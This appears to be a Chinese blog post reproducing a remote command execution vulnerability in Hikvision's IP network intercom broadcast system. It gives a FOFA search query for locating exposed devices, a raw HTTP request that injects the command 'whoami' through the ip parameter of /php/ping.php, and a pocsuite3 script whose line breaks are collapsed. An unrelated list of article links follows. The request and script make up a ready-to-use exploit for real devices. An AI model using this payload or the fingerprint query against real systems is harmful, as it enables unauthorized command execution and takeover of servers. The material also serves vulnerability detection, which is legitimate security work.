当前位置: 首页 > news >正文

漏洞复现-海康威视网络对讲广播系统远程命令执行漏洞(附漏洞检测脚本)

免责声明

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

漏洞描述

海康威视IP网络对讲机系统存在远程命令执行漏洞,通过此漏洞攻击者可在服务器上执行任意命令,控制服务器。

fofa语句

icon_hash="-1830859634"

poc加检测

POST /php/ping.php HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencodedjsondata[type]=666&jsondata[ip]=whoami

poc脚本

脚本使用pocsuite框架

# -*- coding: utf-8 -*-
# 2024/1/1from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
from pocsuite3.api import OrderedDict, OptStringclass haikang_php_RCE(POCBase):author = '炼金术师诸葛亮'createDate = '2024-1-1'name = 'haikang-php-RCE'vulType = 'Command Execution'desc = '海康威视网络对讲广播系统远程命令执行漏洞'def _verify(self):result = {}path = "/php/ping.php"  # 参数url = self.url + pathheaders={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0","Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",'Accept-Encoding': 'gzip, deflate','Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3','DNT': '1','Connection': 'close','Upgrade-Insecure-Requests': '1',"Content-Type": "application/x-www-form-urlencoded"}data ='jsondata[type]=666&jsondata[ip]=whoami'r = requests.post(url,headers=headers,data=data)print(r.text)# 验证成功输出相关信息if r.status_code == 200 and 'admin' in r.text:result['VerifyInfo'] = {}return self.parse_output(result)register_poc(haikang_php_RCE)

脚本利用

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • vue3 element plus el-table封装(二)
  • Spring Boot 自动配置功能介绍
  • STM32CubeMX教程11 RTC 实时时钟 - 入侵检测和时间戳
  • ES6之解构赋值详解
  • 跨进程通信 macOS XPC 创建实例
  • yolov5旋转目标检测-遥感图像检测-无人机旋转目标检测-附代码和原理
  • 面试算法:快速排序
  • 【AIGC-图片生成视频系列-4】DreamTuner:单张图像足以进行主题驱动生成
  • EST-100身份证社保卡签批屏按捺终端PC版web版本http协议接口文档,支持web网页开发对接使用
  • 制作一个可以离线安装的Visual Studio安装包
  • 【QT】qt各模块描述
  • windows2012 安装mysql5.7
  • AI-ChatGPTCopilot
  • 面试高频算法专题:数组的双指针思想及应用(算法村第三关白银挑战)
  • vue前端学习笔记
  • Android 架构优化~MVP 架构改造
  • Angular 4.x 动态创建组件
  • const let
  • el-input获取焦点 input输入框为空时高亮 el-input值非法时
  • Js基础知识(四) - js运行原理与机制
  • Phpstorm怎样批量删除空行?
  • REST架构的思考
  • spring security oauth2 password授权模式
  • tweak 支持第三方库
  • 从伪并行的 Python 多线程说起
  • 代理模式
  • 飞驰在Mesos的涡轮引擎上
  • - 概述 - 《设计模式(极简c++版)》
  • 世界上最简单的无等待算法(getAndIncrement)
  • 思否第一天
  • 小程序上传图片到七牛云(支持多张上传,预览,删除)
  • 用 vue 组件自定义 v-model, 实现一个 Tab 组件。
  • 仓管云——企业云erp功能有哪些?
  • 翻译 | The Principles of OOD 面向对象设计原则
  • ​LeetCode解法汇总307. 区域和检索 - 数组可修改
  • ​草莓熊python turtle绘图代码(玫瑰花版)附源代码
  • # Apache SeaTunnel 究竟是什么?
  • #进阶:轻量级ORM框架Dapper的使用教程与原理详解
  • (1/2) 为了理解 UWP 的启动流程,我从零开始创建了一个 UWP 程序
  • (C#)if (this == null)?你在逗我,this 怎么可能为 null!用 IL 编译和反编译看穿一切
  • (第8天)保姆级 PL/SQL Developer 安装与配置
  • (二十六)Java 数据结构
  • (附源码)计算机毕业设计SSM基于健身房管理系统
  • (论文阅读31/100)Stacked hourglass networks for human pose estimation
  • (论文阅读40-45)图像描述1
  • (区间dp) (经典例题) 石子合并
  • (算法)Travel Information Center
  • (转载)CentOS查看系统信息|CentOS查看命令
  • .L0CK3D来袭:如何保护您的数据免受致命攻击
  • .Net 6.0 处理跨域的方式
  • .NET 8 编写 LiteDB vs SQLite 数据库 CRUD 接口性能测试(准备篇)
  • .Net Memory Profiler的使用举例
  • .Net6支持的操作系统版本(.net8已来,你还在用.netframework4.5吗)
  • .py文件应该怎样打开?
  • @Autowired和@Resource的区别